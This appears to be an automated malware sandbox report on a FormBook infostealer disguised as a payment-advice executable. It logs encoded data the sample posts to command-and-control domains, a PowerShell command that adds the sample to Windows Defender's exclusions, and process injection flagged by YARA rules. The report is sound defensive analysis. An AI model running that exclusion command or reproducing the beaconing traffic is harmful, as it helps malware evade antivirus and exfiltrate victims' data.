                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=ULsS1oq9RVklTdAh4/qnTStEhOWiqq96LlhXJtmryoo6owmt/+yKOQdcaCy3VAWa4f3OIeDII+cj4x60K15Ct17p4DX4fuBBvIjLQIj7CwIcicwTfPus7bZurNiIYgzspSzRSs9XW/H5bVH+iwJ9gqaYDWYh2eIQXcCAr18/OLr5iDaHqDVHX7EpuVUISSgIKmnu8LLJdWtUc4gBArABvTY=
Dec 9, 2024 08:50:28.852627993 CET | 218 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 7931
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/
                                                                                                                                          ETag: "67516c07-1efb"
                                                                                                                                          Server: Anti-CDN
Dec 9, 2024 08:50:28.852652073 CET | 1236 | IN
                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>DDNN404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-sc
Dec 9, 2024 08:50:28.852920055 CET | 1236 | IN
                                                                                                                                          Data Ascii: footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } bl
Dec 9, 2024 08:50:28.852931976 CET | 1236 | IN
                                                                                                                                          Data Ascii: : 22px;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (
Dec 9, 2024 08:50:28.852942944 CET | 1236 | IN
                                                                                                                                          Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
Dec 9, 2024 08:50:28.853535891 CET | 896 | IN
                                                                                                                                          Data Ascii: cn{margin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-c
Dec 9, 2024 08:50:28.853548050 CET | 1236 | IN
                                                                                                                                          Data Ascii: </div> </div> </div> <script type="text/javascript"> var ie = window.ActiveXObject ? true : false; var ie8 = (ie && document.documentMode <= 8) ? true : fa
Dec 9, 2024 08:50:28.853558064 CET | 855 | IN
                                                                                                                                          Data Ascii: assName = "w992"; } else if (windWidth > 768 && windWidth <= 991) { document.body.className = "w769"; } else if (windWidth > 520 && windWidth <= 768) { document.body.class


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49984 | 149.104.34.134 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 08:50:30.058120012 CET | 10860 | OUT | POST /ah82/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.16v9tiu00r.ink
                                                                                                                                          Origin: http://www.16v9tiu00r.ink
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.16v9tiu00r.ink/ah82/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: q0C= [TRUNCATED]
Dec 9, 2024 08:50:31.549318075 CET | 218 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 7931
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/
                                                                                                                                          ETag: "67516c07-1efb"
                                                                                                                                          Server: Anti-CDN
Dec 9, 2024 08:50:31.549503088 CET | 1236 | IN
                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>DDNN404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-sc
Dec 9, 2024 08:50:31.549622059 CET | 1236 | IN
                                                                                                                                          Data Ascii: footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } bl
Dec 9, 2024 08:50:31.549633980 CET | 1236 | IN
                                                                                                                                          Data Ascii: : 22px;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (
Dec 9, 2024 08:50:31.550123930 CET | 1236 | IN
                                                                                                                                          Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
Dec 9, 2024 08:50:31.550134897 CET | 1236 | IN
                                                                                                                                          Data Ascii: cn{margin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-c
Dec 9, 2024 08:50:31.550147057 CET | 1120 | IN
                                                                                                                                          Data Ascii: emote_addr; var cloudNode = $server_addr; var showContent = function () { document.getElementById("ip").textContent = ip; document.getElementById("cloud_node").textContent = cloudNode;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49990 | 149.104.34.134 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 08:50:32.714024067 CET | 495 | OUT | GET /ah82/?q0C=ZJEy2f+tUkBEF+w+scawLBB5zJTblKgdMgFXComG0qR9kHSC6PuhPC8uHAjvWDylpvj6Mcz0IvFDuxOLTDxJzlfpwwLacPhih5HaTILNLTJtkK4jcOiAtOE=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.16v9tiu00r.ink
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 9, 2024 08:50:34.231470108 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:33 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 7931
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/
                                                                                                                                          ETag: "67516c07-1efb"
                                                                                                                                          Server: Anti-CDN
                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>DDNN404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style type="text/css"> /*css reset start*/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; p [TRUNCATED]
Dec 9, 2024 08:50:34.231532097 CET | 224 | IN
                                                                                                                                          Data Ascii: : 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; } article, aside, details, figcaption, figure, fo
Dec 9, 2024 08:50:34.231642962 CET | 1236 | IN
                                                                                                                                          Data Ascii: oter, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } blockquo
Dec 9, 2024 08:50:34.231841087 CET | 1236 | IN
                                                                                                                                          Data Ascii: ;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (min-wi
Dec 9, 2024 08:50:34.231853962 CET | 1236 | IN
                                                                                                                                          Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
Dec 9, 2024 08:50:34.232261896 CET | 1236 | IN
                                                                                                                                          Data Ascii: gin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-cn{marg
Dec 9, 2024 08:50:34.232314110 CET | 1236 | IN
                                                                                                                                          Data Ascii: addr; var cloudNode = $server_addr; var showContent = function () { document.getElementById("ip").textContent = ip; document.getElementById("cloud_node").textContent = cloudNode;
Dec 9, 2024 08:50:34.232326031 CET | 509 | IN
                                                                                                                                          Data Ascii: cument.body.className = "w321"; } else { document.body.className = "lt-w320"; } }; window.onload = function () { showContent(); if (i


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          21 | 192.168.2.4 | 50007 | 124.6.61.130 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:39.770941973 CET | 755 | OUT | POST /hmf8/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.comect.online
                                                                                                                                          Origin: http://www.comect.online
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.comect.online/hmf8/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          22 | 192.168.2.4 | 50013 | 124.6.61.130 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:42.484842062 CET | 775 | OUT | POST /hmf8/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.comect.online
                                                                                                                                          Origin: http://www.comect.online
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.comect.online/hmf8/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          23 | 192.168.2.4 | 50022 | 124.6.61.130 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:45.140060902 CET | 10857 | OUT | POST /hmf8/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.comect.online
                                                                                                                                          Origin: http://www.comect.online
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.comect.online/hmf8/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          24 | 192.168.2.4 | 50029 | 124.6.61.130 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:47.837877035 CET | 494 | OUT | GET /hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ= HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.comect.online
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:50:49.794400930 CET | 464 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:49 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                          X-Redirect-By: WordPress
                                                                                                                                          Location: http://comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          25 | 192.168.2.4 | 50032 | 3.33.130.190 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:55.438766003 CET | 767 | OUT | POST /6wmy/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.emirates-visa.net
                                                                                                                                          Origin: http://www.emirates-visa.net
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.emirates-visa.net/6wmy/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:50:56.542701960 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          26 | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:58.097105026 CET | 787 | OUT | POST /6wmy/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.emirates-visa.net
                                                                                                                                          Origin: http://www.emirates-visa.net
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.emirates-visa.net/6wmy/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:50:59.177483082 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          27 | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:51:00.752921104 CET | 10869 | OUT | POST /6wmy/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.emirates-visa.net
                                                                                                                                          Origin: http://www.emirates-visa.net
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.emirates-visa.net/6wmy/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:51:01.966676950 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Target ID:0
                                                                                                                                          Start time:02:47:54
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                                                                                                                                          Imagebase:0x420000
                                                                                                                                          File size:734'208 bytes
                                                                                                                                          MD5 hash:CEDBF1D5C1BC7D923F885CD24BF225C1
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:02:48:11
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                                                                                                                                          Imagebase:0x520000
                                                                                                                                          File size:433'152 bytes
                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:02:48:11
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                                                                                                                                          Imagebase:0xbe0000
                                                                                                                                          File size:734'208 bytes
                                                                                                                                          MD5 hash:CEDBF1D5C1BC7D923F885CD24BF225C1
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:02:48:11
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:02:48:38
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe"
                                                                                                                                          Imagebase:0x770000
                                                                                                                                          File size:140'800 bytes
                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:02:48:41
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\finger.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                                                                                                          Imagebase:0x130000
                                                                                                                                          File size:13'824 bytes
                                                                                                                                          MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:02:48:55
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe"
                                                                                                                                          Imagebase:0x770000
                                                                                                                                          File size:140'800 bytes
                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:02:49:08
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                          Imagebase:0x7ff6bf500000
                                                                                                                                          File size:676'768 bytes
                                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:11.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:3.2%
                                                                                                                                            Total number of Nodes:187
                                                                                                                                            Total number of Limit Nodes:9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
